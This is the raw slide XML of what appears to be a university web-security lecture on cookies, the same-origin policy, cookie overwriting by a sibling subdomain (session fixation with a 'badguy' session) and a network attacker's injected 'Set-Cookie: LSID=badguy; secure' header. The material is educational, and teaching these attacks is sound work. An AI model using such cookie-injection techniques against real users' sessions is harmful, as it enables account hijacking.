              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=u2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510839-1118-F24B-AF16-148A47A888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32500" y="6077706"/>
            <a:ext cx="274145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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (order is browser-specific)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4D4E96F-5205-D04B-A21C-45CFED434E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Cookie SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1853598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Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F36597-FAD1-7046-A0A1-480B177263B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579450" y="727627"/>
            <a:ext cx="4957553" cy="1645920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>What Does The Server Know About the Cookie Sent by the Browser?</a:t>
            </a:r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0BBB6B01-5B73-410C-B70E-8CF2FA470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8836" y="721224"/>
            <a:ext cx="5367164" cy="5415552"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF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8712F587-12D0-435C-8E3F-F44C36EE71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5217" y="892220"/>
            <a:ext cx="5054517" cy="5097085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="404040"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Graphic 132" descr="Fortune Cookie">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DECBDE0-C46E-4620-9238-3D5CB68E8D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05256" y="1230863"/>
            <a:ext cx="4414438" cy="4414438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 9" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0001526F-4B45-984F-9837-2DBB9AFBEF6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579449" y="2538919"/>
            <a:ext cx="5160793" cy="34961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en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Server only sees Cookie: Name=Value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> see cookie attributes (e.g., “secure”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" u="sng" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t> see which domain set the cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="548640" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>RFC 2109 (cookie RFC) has an option for including domain, path in Cookie header, but not supported by browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242201813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Cloud 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AC0ADE9-5EEB-5049-A163-92712EFB05DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5224420" y="1164656"/>
            <a:ext cx="3126372" cy="5185362"/>
          </a:xfrm>
          <a:prstGeom prst="cloud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loud Callout 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B05D5B-EF16-E64F-8DF8-F4BAF1852783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7958431" y="3494432"/>
            <a:ext cx="3906953" cy="2476594"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68478"/>
              <a:gd name="adj2" fmla="val 3744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805283-FCD0-7E43-91FC-D6D77C746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Set the Cookie?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Cookie Monster on Twitter: &amp;quot;Happy Birthday to me friend @BertSesame! Me  share me favorite cookie with you today! #HappyBirthdayBert… &amp;quot;">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BE9FFCA-A175-5D43-9A85-A7E6347853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32" t="8740" r="30268"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9633857" y="495637"/>
            <a:ext cx="1975758" cy="2253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l 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{825AAE00-ED4D-E244-A53D-2C0DC1C11F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07062" y="2085549"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn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CC4520-D0EF-7C49-9859-D2529E46E3B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6041821" y="2542889"/>
            <a:ext cx="1782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login.cornell.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Free Student Icon. SVG, EPS, JPG, PNG. Download Student Icon.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE128163-1410-D941-BDD2-CDDA43A0D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386" y="2972415"/>
            <a:ext cx="137160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946036A9-D406-3B45-9770-1FD76026C144}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2225777" y="2322154"/>
              <a:ext cx="3576600" cy="10015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946036A9-D406-3B45-9770-1FD76026C14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207777" y="2304514"/>
                <a:ext cx="3612240" cy="103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BB20E8F0-2FD2-C746-B56E-6493689CF305}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5657657" y="2450674"/>
              <a:ext cx="160920" cy="2534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BB20E8F0-2FD2-C746-B56E-6493689CF30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639657" y="2432674"/>
                <a:ext cx="196560" cy="28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8CB56218-94F7-E143-B009-C751E6FC0274}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2358977" y="2821114"/>
              <a:ext cx="3493440" cy="79668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8CB56218-94F7-E143-B009-C751E6FC027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341337" y="2803114"/>
                <a:ext cx="3529080" cy="83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50E19C6E-923C-F242-8A94-71089380B3A7}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2430977" y="3617794"/>
              <a:ext cx="633240" cy="25164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50E19C6E-923C-F242-8A94-71089380B3A7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412977" y="3599794"/>
                <a:ext cx="668880" cy="28728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BEE9AAD5-162D-C64C-B03D-5909A88381F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3559629" y="3198797"/>
            <a:ext cx="25363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sets session-id cookie for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cornell.edu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCA36F98-23DB-E74A-876D-8AB3C0882A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22179" y="4059792"/>
            <a:ext cx="365125" cy="36512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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn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577EC45-F126-2B40-986A-7450E5340143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6041821" y="3671033"/>
            <a:ext cx="1620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evil.cornell.edu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851928B3-E082-8B4A-A863-D2BCFC209229}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2592257" y="4098754"/>
              <a:ext cx="3742560" cy="1839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851928B3-E082-8B4A-A863-D2BCFC209229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574257" y="4080754"/>
                <a:ext cx="3778200" cy="21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AD4F0903-C8B7-7047-B3C1-1A1E286A7B36}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6198377" y="4182994"/>
              <a:ext cx="142920" cy="16992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AD4F0903-C8B7-7047-B3C1-1A1E286A7B36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180737" y="4165354"/>
                <a:ext cx="178560" cy="20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05986A9E-50EB-2C47-AF0F-AFA221383EBA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2668937" y="4338874"/>
              <a:ext cx="3665520" cy="23328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05986A9E-50EB-2C47-AF0F-AFA221383EBA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651297" y="4321234"/>
                <a:ext cx="3701160" cy="26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76A4ADD6-16BE-C44B-89B6-04235308125F}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2691977" y="4529314"/>
              <a:ext cx="179640" cy="28224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76A4ADD6-16BE-C44B-89B6-04235308125F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673977" y="4511314"/>
                <a:ext cx="215280" cy="317880"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic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E7DBA4D1-1CB4-C145-81AA-8CF99328A20F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3119232" y="4654237"/>
            <a:ext cx="41031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overwrites .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session-id cookie with session-id of user “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> a violation of SOP (why?)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{404C632C-1BFE-3247-A751-913FBC1F54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04741" y="5552264"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt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C55173B-9908-0B4B-9F19-E8B08AAE496A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7222380" y="5857675"/>
            <a:ext cx="1973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cs5435.cornell.edu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7E43E5CE-D52D-3A43-8B5B-E85FCC1EED87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2124257" y="4832434"/>
            <a:ext cx="4253040" cy="1196280"/>
            <a:chOff x="2124257" y="4832434"/>
            <a:chExt cx="4253040" cy="1196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CD88ABA2-2D59-2545-BBE1-0F49A4D5DC12}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2124257" y="4832434"/>
                <a:ext cx="4228920" cy="10731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CD88ABA2-2D59-2545-BBE1-0F49A4D5DC12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106617" y="4814794"/>
                  <a:ext cx="4264560" cy="11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20AA17EE-FB47-714F-87F2-ED113A107CA6}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5979857" y="5849434"/>
                <a:ext cx="397440" cy="17928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20AA17EE-FB47-714F-87F2-ED113A107CA6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5962217" y="5831434"/>
                  <a:ext cx="433080" cy="2149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9A064137-9FC1-3A4E-9B68-CDF0534E090E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225777" y="5936676"/>
            <a:ext cx="35156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session-id cookie of “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”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F75CCB0-7BF1-7C40-9E4E-B875A4D9EBC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8395720" y="4020766"/>
            <a:ext cx="33548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Expects session-id cookie from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>login.cornell.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Cannot tell it was overwritten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Thinks it’s talking to ”bad guy”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643814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12" grpId="0"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="28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Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC3D611-9F37-6943-90DB-04E82261589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Overwriting “Secure” Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#13;&#10;Second level&#13;&#10;Third level&#13;&#10;Fourth level&#13;&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72EA2C6C-0603-3C48-8104-0CBAE7618F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20"/>
            <a:ext cx="10058400" cy="4297680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en-US" sz="2000" dirty="0"/>
              <a:t>Alice logs in at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>www.google.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Alice visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>//www.google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Automatically, due to the phishing filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Network attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can inject into response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>   Set-Cookie:  LSID=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>badguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; secure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Browser thinks this cookie came from http://google.com, allows it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>overwrite secure cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="62468" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1087CE0-75A9-7343-A42E-AE9BE4C474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58" t="48659" r="32237" b="38725"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1414131" y="2753444"/>
            <a:ext cx="8239125" cy="1331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 type="none" w="lg" len="med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62469" name="Rounded Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7C66988-7222-4A46-9D1A-89C3231DD2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14130" y="3530500"/>
            <a:ext cx="8239125" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="14902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 type="triangle" w="lg" len="med"/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buChar char="u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Char char="•"/>
              <a:defRPr kumimoji="1"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•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kumimoji="0" lang="en-US" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2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53194DA-E601-A54A-A715-DF0F0983B29E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4343471"/>
            <a:ext cx="2057400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US" dirty="0"/>
              <a:t>LSID, GAUSR are </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“secure” cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62471" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98A01BE0-CE12-5643-8A1B-23A908294631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8458200" y="3933895"/>
            <a:ext cx="381000" cy="41910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658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F04BED5A-E98E-4DA0-BAA5-4F6AB2492D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EB64B94A-E40E-48CE-BD7B-C1A30AE572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3982" y="488542"/>
            <a:ext cx="11244036" cy="5880916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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49EC5CA6-6479-49D5-B4B5-5643D26B83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84442" y="2057401"/>
            <a:ext cx="0" cy="27432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Rectangle 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1B26337-5AA4-470D-9687-5907CB53B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685800"/>
            <a:ext cx="10853928" cy="5486400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6350" cap="sq" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64513" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E422DA4-E469-9749-9B63-E4343D847F0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66440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Accessing Cookies via DOM</a:t>
